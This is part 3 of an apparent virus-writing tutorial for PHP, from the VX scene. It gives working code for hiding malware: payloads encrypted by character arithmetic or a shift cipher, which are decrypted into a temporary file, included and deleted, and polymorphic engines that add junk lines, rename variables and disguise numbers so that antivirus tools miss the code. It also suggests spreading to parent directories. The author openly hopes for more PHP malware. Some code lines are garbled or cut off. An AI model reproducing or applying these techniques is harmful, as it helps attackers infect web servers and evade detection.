PHP Virus Writing Guide part 3

Index:

- - - - - - - - - - - - - [ Encryption Example - Type II ] - - - - - - - - - - - - -
$content=cr(-177,237,1).cr(169,106,2).cr(-135,247,1).cr(150,46,2).cr(8624,77,3).cr(56,43,2).
cr(1900,190,3).cr(127,15,2).cr(20,94,1).cr(51,54,1).cr(110,0,2).cr(372,256,2).
cr(247,207,2).cr(57,18,2).cr(-1,84,1).cr(322,221,2).cr(147,48,2).cr(232,121,2).
cr(7700,70,3).cr(-33,133,1).cr(-31,63,1).cr(180,97,2).cr(-106,207,1).cr(-148,247,1).
cr(184,70,2).cr(322,221,2).cr(-48,164,1).cr(167,135,2).cr(-71,148,1).cr(24947,247,3).
cr(10810,94,3).cr(202,87,2).cr(4559,47,3).cr(261,158,2).cr(312,211,2).cr(-79,111,1).
cr(-3,61,1).cr(-5,73,1).cr(2262,58,3).cr(56,15,2).cr(-145,204,1).cr(3289,253,3).
cr(225,215,2).cr(21,42,1).cr(302,240,2);
copy(__FILE__,'file.php');
$aa=fopen('file.php','w+');
fwrite($aa, $content);
fclose($aa);
include('file.php');
unlink('file.php');

function cr($a,$b,$c)
{
if ($c==1) { return(chr($a+$b)); }
if ($c==2) { return(chr($a-$b)); }
if ($c==3) { return(chr($a/$b)); }
}
?>
- - - - - - - - - - - - - [ Encryption Example - Type II ] - - - - - - - - - - - - -

Well, you should have understand what I meant, when you looked at the code.
I'll show you, what it does exacly. The encrypt code is a secret message
again

--> Every sign is a call to the function with 3 values. The first and the second
value are the numbers, the third value is just the information, which
calculation the function will have to do (+,-,/), something like the key.

--> After getting every sign, the code will do the same as the code above.







c) Useing changed character string

This technique is a well-known one in script languages. For instands jackie
did it in Javascript. Therefore I thought that it should also be able make it
in PHP. And as you can see, it was able. The technique works as follow: The
(virus-) code is encrypt in a variable. It's encrypt via adding 3 (the key) to
the ASCII of every character. Should be easy to understand. Now let's look
at the example I made:

- - - - - - - - - - - - - [ Encryption Example - Type III ] - - - - - - - - - - - - -
$all='?Bsks
sulqw+*111frro/#wklv#lv#wkh#wklug#hqfu|swlrq#whfkqltxh#dqg#|rx#duh#vwloo#zlwk#ph111#=,*,>
BA';
$i=0; $content='';
while($icopy(__FILE__,'file.php');
$aa=fopen('file.php','w+');
fwrite($aa, $content);
fclose($aa);
include('file.php');
unlink('file.php');
?>
- - - - - - - - - - - - - [ Encryption Example - Type III ] - - - - - - - - - - - - -

The encrypt variable-content contains the code of a PHP file writing a message to
the screen. The rest works as always: Makeing a new file, and overwrite them with
the decrypt code, execute the file, and delete it. How the en/decryption works I'll
show you:

--> Changes ever character of the encrypt string to ASCII numbers (via 'ord()')

--> Decreases the number with the key (which is 3 in this sample)

--> Changes the number back to characters (via 'chr()'), and you got the real string.







3) Polymorphism

As everybody knows, this is one of the most important techniques to fake AVs
and to show, that you know, what you're doing . So I desided also to write
something about this technique here. In fact, I've never seen any other poly
PHP virus around the world (maybe it exists anyway). It was really easy for
me to write some poly-engines, because PHP isn't a really difficult language.
I tried my best to show you, how a PHP poly engine could work.


a) Adding Trash

This technique is a well-known in many script languages. Therefor I tought, it
should also be possible in PHP. Then I sat down, and began to write. About 2h
later (with smoking-breaks, sure :D), I had the finished code. First I want
to tell you, what kind of trash/junk/garbage I included in my example:

- // shsdfjksfdjfds

- $kasjkh=192847832;

- $lwekjcmws='iwsdkjhfskjbnla';

Well, now we know, what to include. Anything else to do? Sure, we have to delete
the trash again, oterhwise the file would have 2MB after the 10th time you run it,
and I think, you don't want that. So, how to delete trash? In my example I searched
the first letter of a line, and checked, if it's a '/' or a $'. If yes, it's trash
and we don't have to include it to our new code. It seems I explained everthing.
Now let's have a look at the code:

- - - - - - - - - - - - - - - [ Adding Trash example ] - - - - - - - - - - - - - - -
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$newcont='srand((double)microtime()*1000000);
while ($string && $string!='?>') {
if(rand(0,1)) {
if (rand(0,1)) { $newcont.='// '.trash('').chr(13).chr(10); }
if (rand(0,1)) { $newcont.='$'.trash('').'='.chr(39).trash('').chr(39).';'.chr(13).chr(10); }
if (rand(0,1)) { $newcont.='$'.trash('').'='.rand().';'.chr(13).chr(10); }
}
$string=strtok(chr(13).chr(10));
if ($string{0}!='/' && $string{0}!='$') { $newcont.=$string.chr(13).chr(10); }
fwrite(fopen(__FILE__, 'w'),$newcont);
}

function trash($var) {
do { $var.=chr(rand(97,122)); } while (rand(0,7));
return $var;
}
?>
- - - - - - - - - - - - - - - [ Adding Trash example ] - - - - - - - - - - - - - - -

Everthing should be clear now, anyway, I'll tell you the most important things in this
code-snip:

--> It splits the whole filecontent of the virus ('__FILE__', as it's called in PHP)
to lines (chr(13).chr(10)).

--> One in two, if the last line wasn't a trash, it adds a trashline.

--> If the last line was no trashline, it adds the line to the new content

--> It writes the new content to the file







b) Variable Changing

This is another well-known script technique to morph the virus. So I did it again in PHP.
Let's explain the technique. You're useing many varibles in a virus, and if the variables
have the same name every generation, our friends the AV-guys are able to use this fact to
detect the virus. So it could be of much value to change the variable-names. How I did it?
I used an array with all my varibale, which i'm using. Than I searched for every value from
the array in the virus-file (=i searched for every variable), and replaced it via the command
'str_replace' and used a new one, which got by my 'trash-function'. Now let's look at the
source of the example:

- - - - - - - - - - - - - - - [ Variable changing example ] - - - - - - - - - - - - - - -
$changevars=array('changevars', 'content', 'newvars', 'counti','countj', 'trash');
srand((double)microtime()*1000000);
$content=fread(fopen(__FILE__,'r'),filesize(__FILE__));
$counti=0;
while($changevars[$counti]) {
$content=str_replace($changevars[++$counti], trash('',0), $content);
}
fwrite(fopen(__FILE__,'w'),$content);

function trash($newvar, $countj) {
do { $newvar.=chr(rand(97,122)); } while (++$countj return $newvar;
}
?>
- - - - - - - - - - - - - - - [ Variable changing example ] - - - - - - - - - - - - - - -

Easy code, easy to understand. Anyway, let me tell you, how it exactly works:

--> Makes a new array with all variables and function-names

--> Gets the whole content of the virus-file

--> Replaces every element of the array in the content, and use a new one.

--> Writes the content back to the file






c) Number Changing

Every code contains any numbers, whatever this number does. After thinking a little bit
I found out, that I can change the numbers too. So I desited to make a PHP code, which
changes the numbers in it's code. How can we change a number, you may think. It's really
easy: You make a calculation with that number, which returns the number you want.
Let's have a look at the possible variants:

--> 10=(12-2)

--> 10=(8+2)

--> 10=(80/

I also tried to use div, but there are comma-numbers, which don't really work. But it's no
problem, there are enought variants with just 3 calculation types. Now I'll show you, how a
number could be after the 4th morphing:

--> 10=((((1289-9)/(6+2))/((15+5)-(4+6)))-(((252/6)/(7-1))-((4+3)-(30/5))))

Now I hope, that you know about the damn cool results of this technique
After explaining the main-thing, I'll show you the little code, who changes the numbers.

- - - - - - - - - - - - - - - [ Number Changing example ] - - - - - - - - - - - - - - -
$newcont=fread(fopen(__FILE__,'r'),filesize(__FILE__));
srand((double)microtime()*1000000);
$count=-1; $number='';
while(++$count if (ord($newcont{$count})>47 && ord($newcont{$count})<58) {
$number=$newcont{$count};
while(ord($newcont{++$count})>47 && ord($newcont{$count})<58) { $number.=$newcont{$count}; }
$remn=rand(1,10);
switch(rand(1,3)) {
case 1:
$cont.='('.($number-$remn).'+'.$remn.')'; break;
case 2:
$cont.='('.($number+$remn).'-'.$remn.')'; break;
case 3:
$cont.='('.($number*$remn).'/'.$remn.')'; break;
}
}
$cont.=$newcont{$count};
$number='';
}
fwrite(fopen(__FILE__,'w'),$cont);
?>
- - - - - - - - - - - - - - - [ Number Changing example ] - - - - - - - - - - - - - - -

Now a shourt explanation about the code:

--> Reads everything from the file

--> Searchs for a number in every sign [sign>chr(47) && sign
--> Reads the rest of the number

--> makes a new calculation with that number

--> Writes the new content to the file







4) Other thoughts

When I wrote this article, some other ideas came to my mind, therefore
I also what to give the ideas to you. Maybe that some of the ideas are
just non-sense or other are brilliant (I don't think so, but wonder happens
:D ). OK, let's start: This part contains ideas for better hideing to don't
become detected, or how to spread faster. I hope, you also like to read this!


a) Find more files

What must we do if we want to find more files? Search in more directories.
My idea is this one: Since the command 'getcwd()' returns the current dir,
we are able to infect also every root-directory. How to do this? Look at the
return-value of 'getcwd()':

--> E:\SPTH\Programme\minixampp\htdocs

Now we have 4 directories, which aren't infected so far:

~~ E:\SPTH\Programme\minixampp
~~ E:\SPTH\Programme
~~ E:\SPTH
~~ E:\

And how to get the directories? Just searchs for a '\' in the current dir, than
delete character by character, till you have a '\'. Than you have the directory-
name. The rest is easy: Open it via 'opendir()', and do the same as I tried to
explain you







b) Changing the commands

Maybe you already know it, but PHP contains tons of aliases for different commands
and we can use that. I'm sure you know how Just replace one command with another,
which is doing the same. I made a list of commands and it's aliases, to show you,
how much we are able to change. This is just a short list, nevertheless it could
be useful, when you want to make such a polymorphism virus.

chop - rtrim()
close - closedir()
die - exit()
dir - getdir()
doubleval - floatval()
fputs - fwrite()
ini_alter - ini_set()
is_double - is_float()
is_integer - is_int()
is_long - is_int()
is_real - is_float()
is_writeable - is_writable()
join - implode()
magic_quotes_runtime - set_magic_quotes_runtime()
pos - current()
rewind - rewinddir()
show_source - highlight_file()
sizeof - count()
strchr - strstr()

Get the full list of aliases here: http://zend.com/phpfunc/all_aliases.php







5) Last Words

Comming to an end I want to say that I had really much fun while discovering this language,
and I also hope, that you learned some things. I hope, that I will see many new and good PHP
maleware in near future. If I don't see any, I know, that I worked 2-3 month for nothing.
But let's see it positiv: Now it's easy to write strong viruses for this language, because
the techniques are already discovered. Here at this point I want to thank MaskBits/VXI for
making the first PHP maleware called PHP.Pirus, which were released in 29a#5. This inspired
me in writing this article, because I found out, that the current PHP viruses are not at
the point where you can say: "It's perfect, we can't make it better." . Another guy I want
to thank is SnakeByte, because of his articles about Perl poly/EPO/encryption in 29a#6. It
helped me in some parts of this article. Greets goes also to Kefi, who wrote also a PHP-poly-
morphic virus, which I haven't seen so far. The fact that I know that made me very activ in
writing this article . Now I want to send some greets and thanks out to the world, because
I think that I said everything, what is important:
PhileT0aster and the rest of the rRlf-gang , jackie for being something like an idol for me,
SlageHammer & Knowdeth - the most friendly VX guys i know , VirusBuster - for answering my
stupid questions every time, Vorgon - for trying to teach me assembler :D, Toro - for helping
me with many problems, SnakeByte for the great tutorials you wrote, SAD1c - for beeing a great
guy, VorteX & Worf for being the first guys who helped in the VX-world , VxF & Metal for
the great fun in IRC , Doctor Rave for some great ideas you gave me, prizzy for the nice email
you wrote, herm1t for hosting my homepage, sinocred for hateing the ' hi' :D, PanoiX for
being a cool guy , Arzy for being very helpful :D, Necronomikon & Gigabyte for cool talks in
IRC (unfortunatly we have nearly no contact recently) and many other cool individuals I know...
I also want to send out some group greets: Greets to rRlf (of course :D), 29A, iKx, SLAM, TKT,
MIONS, Whackerz and every other more or less activ virus-writing-group!